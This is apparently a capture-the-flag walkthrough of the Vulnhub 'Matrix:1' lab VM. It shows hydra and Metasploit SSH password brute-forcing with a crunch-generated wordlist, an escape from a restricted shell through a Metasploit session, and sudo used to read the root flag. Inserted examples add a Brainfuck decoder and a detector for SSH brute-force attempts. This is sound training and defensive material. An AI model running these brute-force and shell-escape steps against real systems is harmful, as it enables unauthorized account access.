Matrix

It has been a long time since I did a boot-2-root box from vulnhub.com.
If you don’t know the site and you’re interested in learning pentesting skills or honing your skills, this is the right spot.
There are numerous VMs with different levels, and most of them have a theme, which can be great fun.
When sites like hackthebox.eu weren’t there, this was the place to be for learning the right skills.
I have chosen to do ‘Matrix:1’ (link), created by Ajay Verma.
The level should be medium, and the goal is to get root and read /root/flag.txt.
As for hints: follow your intuitions... and enumerate!
Let’s get cracking!
Enumeration
For my initial enumeration I use a tool called Red Team Kit (RTK), which has an automated recon scanner.
It does the port scanning and gives some suggestions based on the results.
(ASCII-art banner) Created by n0w4n
[-] Do you want to save the reports? (y/n) y
[-] Give path for saving the reports (example: /root/rtk/reports/): /root/vulnhub/matrix
[-] What is the IP address of the target? 192.168.100.139
[*] Checking connection to target
[*] Connection to 192.168.100.139 established
[*] Starting a Masscan to find open ports on the target
[*] This can take some time as this is for TCP and UDP
[*] Parsing output and loading up for further analysis
[*] Starting a TCP nmap scan on the target with acquired ports to retrieve all information
[*] This can take some time
[*] There are no open UDP ports
[*] Creating report
#############################################################################################
[*] Found the following open ports and services on the target:
22    tcp  ssh   OpenSSH 7.7 (protocol 2.0)
80    tcp  http  SimpleHTTPServer 0.6 (Python 2.7.14)
31337 tcp  http  SimpleHTTPServer 0.6 (Python 2.7.14)
#############################################################################################
[*] The following recommendations can be made:
[*] SSH
Try bruteforcing with the commands:
1.) hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.100.139 -t 4 ssh
2.) hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 192.168.100.139 -t 4 ssh (If nothing else works - try this as a last resort)
[*] WEB
To enumerate the directories run the command:
1.) python3 <path to dirsearch>/dirsearch.py -u 192.168.100.139 -e php -r -f -x 400,403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
back to (m)ain menu or (e)xit this program?
It looks like there is a webserver listening on 2 ports and an SSH server on the default port.
Webserver
While starting DirSearch in the background, I open my browser to check out port 80 first.
Welcome in the Matrix!
When looking at the source code there is a picture to be found:
<div class="service"><img src="assets/img/p0rt_31337.png"/ width="15">
A white rabbit to be more precise.
The name of the picture is the hint, but that port I already got from the port scan.
Port 31337 is my next port to visit with my browser.
In the source code there is another hint, this time in the form of a base64-encoded comment:
<!--p class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=</p--> </div><!-- End / service -->
Let’s decode it.
root@kali:~/vulnhub/matrix# echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
It looks like a Linux command where a string is echoed and redirected into a file called Cypher.matrix.
When directing my browser to http://192.168.100.139:31337/Cypher.matrix I get to download a file.
Let’s check out what it is:
root@kali:~/vulnhub/matrix# file Cypher.matrix Cypher.matrix: ASCII text root@kali:~/vulnhub/matrix# cat Cypher.matrix +++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++ +.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.- -.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+ +++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>--- ---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[- >++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- ----- -<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++ +[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+ +++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++< ]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[ ->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++ [->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---< ]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++ +[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- ----- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> ----- -.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+ +++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ .<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++ +++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<] >++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.- --.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++ ++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->- ----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++ +.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+ ++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[-> ---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----. 
<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--. --.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+ +.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++ +.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[-> ----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++< ]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++< ]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+ +++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++< ]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++ +++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[-> ---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++ +++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++ [->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[-> ----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[- >---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.< +++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++ +++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<] >--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->-- ----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[- >---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++< ]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++ .+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- ----- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. 
----- ----. <++++ ++++[ ->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++ +[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]> ----- ---.- --.<
This can be confusing if you see it for the first time, but if you have seen it before it is quite simple.
It is an esoteric programming language called Brainfuck. Brainfuck was designed for extreme minimalism and leads to obfuscated code, with programs containing only eight distinct characters.
There are numerous online decoders; I use https://www.splitbrain.org/_static/ook/ for the decoding part.
You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
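The decoding step above, as an added example (not code from the original writeup or from the box): a small Brainfuck interpreter in Python that drops everything except the command characters, so the space-separated 5-character groups in Cypher.matrix run unchanged. The SAMPLE program is constructed for illustration, not the file from the box.

```python
# Minimal Brainfuck interpreter (added example, not code from the original writeup).
# Brainfuck has eight commands (> < + - . , [ ]); every other byte is ignored, which is
# why the space-separated 5-character groups in Cypher.matrix run unchanged.

def bracket_map(code):
    """Pair each '[' with its ']' so loops can jump; reject unbalanced programs."""
    stack, jumps = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError("unmatched ']' at offset %d" % i)
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unmatched '[' at offset %d" % stack[-1])
    return jumps

def run_brainfuck(source, max_steps=5_000_000):
    """Run source and return its output; max_steps keeps a looping file from hanging."""
    code = "".join(ch for ch in source if ch in "><+-.[]")  # drop spaces/newlines; ',' (input) unsupported
    jumps, tape = bracket_map(code), bytearray(30000)
    ptr = pc = steps = 0
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF  # 8-bit cells wrap around
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(tape[ptr])
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # back to the matching '['
        pc += 1
    return out.decode("latin-1")

# Constructed sample in the same 5-character grouping as Cypher.matrix; it prints "Hi".
SAMPLE = "+++++ +++[> +++++ ++++< -]>.< ++++[ >++++ ++++< -]>+."
```

Calling run_brainfuck(open("Cypher.matrix").read()) does the same job as the online decoder; the step limit matters because a file you did not write can loop forever.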
Nice... but there is a catch. I need to figure out the last characters to get it to work.
As for options I can try and brute force it, but mainly I try to use brute force as a last resort.
On Kali there are some password lists, so maybe it’s inside one of them.
root@kali:/usr/share/wordlists# grep -r . -e "k1ll0r*"
./rockyou.txt:k1ll0watt
./rockyou.txt:k1ll0187
./seclists/Passwords/Leaked-Databases/md5decryptor.uk.txt:k1ll0rd1e
Not really what I’m looking for, as it doesn’t have two chars after the r, but three.
Let’s just try it and then brute force it with a loop.
root@kali:/usr/share/wordlists# ssh guest@192.168.100.139
The authenticity of host '192.168.100.139 (192.168.100.139)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.100.139' (ECDSA) to the list of known hosts.
guest@192.168.100.139's password:
Permission denied, please try again.
Nope... let’s turn to crunch.
SSH
Crunch is a tool to create wordlists. It is quite handy and easy to use.
Because I already have a part of the password and I know I’m missing two characters, the syntax will be like this:
root@kali:~/vulnhub/matrix# crunch 8 8 -t k1ll0r%@ -o passlist.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260

crunch: 100% completed generating output
There are different ways to use the list and brute force SSH. I go for the SSH scanner from Metasploit.
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7i'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7j'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7k'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7l'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7m'
[+] 192.168.100.139:22 - Success: 'guest:k1ll0r7n' 'uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare) Linux porteus 4.16.3-porteus #1 SMP PREEMPT Sat Apr 21 12:42:52 Local time zone must be set-- x86_64 Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz GenuineIntel GNU/Linux '
[*] Command shell session 1 opened (192.168.100.137:44711 -> 192.168.100.139:22) at 2019-02-13 21:32:26 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) >
That one worked.
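From the defender's side, the run of failures followed by a success for the same account from the same source is exactly what sshd writes to auth.log. As an added example (not from the original writeup), a Python detector that flags that pattern over constructed auth.log lines; the hostname, pids, ports and timestamps are invented.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches sshd password-auth lines in the syslog format found in auth.log (sample below is constructed).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2$"
)

def parse(line, year=2019):
    """Return (timestamp, result, user, src) for an sshd auth line, else None (year is not logged)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def find_bruteforce(lines, threshold=5, window_s=60):
    """Flag every success that follows >= threshold failures for the same
    (source, account) within window_s seconds: a password guess that landed."""
    failures = defaultdict(list)  # (src, user) -> timestamps of recent failures
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        key = (src, user)
        recent = [t for t in failures[key] if (ts - t).total_seconds() <= window_s]
        if result == "Failed":
            failures[key] = recent + [ts]
        elif len(recent) >= threshold:
            hits.append((src, user, len(recent)))
            failures[key] = []
    return hits

# Constructed sample: eight guesses against 'guest' from one scanner within ten
# seconds, then the hit; plus one unrelated failed login that must not be flagged.
SAMPLE_LOG = [
    "Feb 13 21:31:%02d porteus sshd[18%02d]: Failed password for guest "
    "from 192.168.100.137 port 447%02d ssh2" % (s, s, s) for s in range(10, 18)
] + [
    "Feb 13 21:31:20 porteus sshd[1850]: Accepted password for guest "
    "from 192.168.100.137 port 44711 ssh2",
    "Feb 13 21:40:05 porteus sshd[1902]: Failed password for trinity "
    "from 192.168.100.50 port 50211 ssh2",
]
```

Lowering the threshold or widening the window trades false positives (a user mistyping a few times) against catching slower guessing; the single trinity failure stays unflagged either way.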
root@kali:/usr/share/wordlists# ssh guest@192.168.100.139
guest@192.168.100.139's password:
Last login: Mon Aug  6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$
I’m in... now to do some recon on the system.
guest@porteus:~$ id
-rbash: id: command not found
Dang... looks like I entered a restricted bash shell.
To get out of this restricted shell I need to know what I can work with.
guest@porteus:~$ echo $PATH
/home/guest/prog
guest@porteus:~$ echo $SHELL
/bin/rbash
To find out which commands I can use, I hit tab twice:
guest@porteus:~$ ! ]] builtin compgen declare echo eval fc getopts in ll mc pwd select suspend trap umask wait ./ alias caller complete dirs elif exec fg hash jobs local mcedit read set test true unalias while : bg case compopt disown else exit fi help kill logout popd readarray shift then type unset { [ bind cd continue do enable export for history la ls printf readonly shopt time typeset until } [[ break command coproc done esac false function if let mapfile pushd return source times ulimit vi
I can try to find the thing I need to break free... or I can hit up msfconsole again and run the SSH scanner again.
[*] Command shell session 1 opened (192.168.100.137:32967 -> 192.168.100.139:22) at 2019-02-13 21:47:17 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type         Information                               Connection
  --  ----  ----         -----------                               ----------
  1         shell linux  SSH guest:k1ll0r7n (192.168.100.139:22)   192.168.100.137:32967 -> 192.168.100.139:22 (192.168.100.139)

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare)
As you can see I’m not bothered with the restricted shell. Much better.
Now to get a proper TTY shell.
python -c 'import pty;pty.spawn("/bin/bash");'
guest@porteus:~$ id
id
uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare)
Much better.
guest@porteus:~$ sudo -l
sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
Ok... so normally I would check out the (root) and (trinity) parts of the sudo permissions.
But in this case I can do everything as root with sudo... no strings attached.
guest@porteus:~$ sudo ls -lah /root
sudo ls -lah /root

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password: k1ll0r7n
total 74K
drwx------ 16 root root 4.0K Aug 14  2018 .
drwxr-xr-x 51 root root 4.0K Aug  6  2018 ..
-rw-------  1 root root   52 Aug 14  2018 .Xauthority
-rw-------  1 root root 6.1K Aug 14  2018 .bash_history
-rw-r--r--  1 root root   79 Mar  5  2017 .bash_profile
-rw-r--r--  1 root root 1.2K Apr 22  2018 .bashrc
drwx------  5 root root 4.0K Aug  6  2018 .cache
drwxr-xr-x 21 root root 4.0K Aug 13  2018 .config
drwx------  3 root root 4.0K Aug  6  2018 .dbus
-rw-------  1 root root   16 Aug  6  2018 .esd_auth
drwx------  4 root root 4.0K Aug  6  2018 .thumbnails
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Desktop
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Documents
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Downloads
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Music
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Pictures
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Public
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Videos
-rw-r--r--  1 root root  691 Aug 14  2018 flag.txt
guest@porteus:~$ sudo cat /root/flag.txt
sudo cat /root/flag.txt
(ASCII-art cartoon; the caption reads:)
EVER REWIND OVER AND OVER AGAIN THROUGH THE INITIAL AGENT SMITH/NEO INTERROGATION SCENE IN THE MATRIX AND BEAT OFF
WHAT
NO, ME NEITHER
IT'S JUST A HYPOTHETICAL QUESTION
guest@porteus:~$
And there you have it. I don’t know if this was the creator’s intended way, but hey! Whatever gets it to work.